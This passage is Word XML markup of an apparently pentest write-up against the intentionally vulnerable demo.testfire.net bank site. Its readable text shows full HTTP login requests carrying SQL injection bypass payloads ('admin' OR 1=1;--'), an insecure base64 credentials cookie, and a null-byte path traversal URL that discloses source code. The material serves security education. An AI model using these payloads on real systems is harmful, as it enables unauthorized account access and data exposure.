              </w:rPr>
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="873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POST /bank/login.aspx HTTP/1.1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Host: demo.testfire.net</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.6) Gecko/20100101 Firefox/10.0.6</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Accept-Language: en-us,en;q=0.5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Proxy-Connection: keep-alive</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Referer: http://demo.testfire.net/bank/login.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Cookie: ASP.NET_SessionId=2ks1fprgokgkd0jthbms3d25; amSessionId=62733112717</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Content-Length: 47</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>uid=admin' OR 1=1;--&amp;passw=test&amp;btnSubmit=Login</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The result looks very promising! We were able to login without specifying any password. All you need is a valid username. The same vulnerability applies to theÂ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> field as well. Following request will work too:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="893658"/>
        <w:tblW w:w="14879" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="434"/>
        <w:gridCol w:w="14444"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3781"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="434"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 xml:space="preserve"> 1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14444"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POST /bank/login.aspx HTTP/1.1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Host: demo.testfire.net</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.6) Gecko/20100101 Firefox/10.0.6</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Accept-Language: en-us,en;q=0.5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Proxy-Connection: keep-alive</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Referer: http://demo.testfire.net/bank/login.aspx</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Cookie: ASP.NET_SessionId=2ks1fprgokgkd0jthbms3d25; amSessionId=62733112717; amUserInfo=UserName=YWRtaW4nIE9SIDE9MjstLQ==</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>&amp;Password=dGVzdA==</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Content-Length: 50</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>uid=admin&amp;passw=' OR 1=1;--&amp;btnSubmit=Login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="257" w:before="257"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Semibold" w:eastAsia="Source Sans Pro Semibold" w:hAnsi="Source Sans Pro Semibold" w:cs="Source Sans Pro Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Base64-encoded login credentials</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="18" w:name="_Toc4j9gb71ah7nd"/>
      <w:bookmarkEnd w:id="18"/>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After a successful login the server will set a cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>amUserInfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> which contains login information encoded in base64. This is for sure a vulnerability since an attacker could easily decode the information and get the login credentials.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="176454"/>
        <w:tblW w:w="6779" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="6449"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="871"/>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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644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amUserInfo=UserName=YWRtaW4nIE9SIDE9MjstLQ==&amp;Password=dGVzdA==</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decodes to…</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="523993"/>
        <w:tblW w:w="5519" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="5189"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="871"/>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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="518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amUserInfo=Username=admin' OR 1=2;--&amp;Password=test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="274" w:before="274"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Semibold" w:eastAsia="Source Sans Pro Semibold" w:hAnsi="Source Sans Pro Semibold" w:cs="Source Sans Pro Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="33"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>/bank/main.aspx</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="19" w:name="_Toc1t3ep7vzrrrg"/>
      <w:bookmarkEnd w:id="19"/>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After a successful login you’ll be redirected to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://demo.testfire.net/bank/main.aspx"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>http://demo.testfire.net/bank/main.aspx</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>. Let’s have a look at the functionalities within this page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="257" w:before="257"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Semibold" w:eastAsia="Source Sans Pro Semibold" w:hAnsi="Source Sans Pro Semibold" w:cs="Source Sans Pro Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Source code disclosure&lt;</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="20" w:name="_Toch0bx564h8dv1"/>
      <w:bookmarkEnd w:id="20"/>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Here’s the source code (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://demo.testfire.net/default.aspx?content=../bank/main.aspx.cs%EF%BF%BD.txt"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>http://demo.testfire.net/default.aspx?content=../bank/main.aspx.cs%00.txt</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="118479"/>
        <w:tblW w:w="12284" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="540"/>
        <w:gridCol w:w="11744"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="27591"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="54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 xml:space="preserve">  1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  2</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  3</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
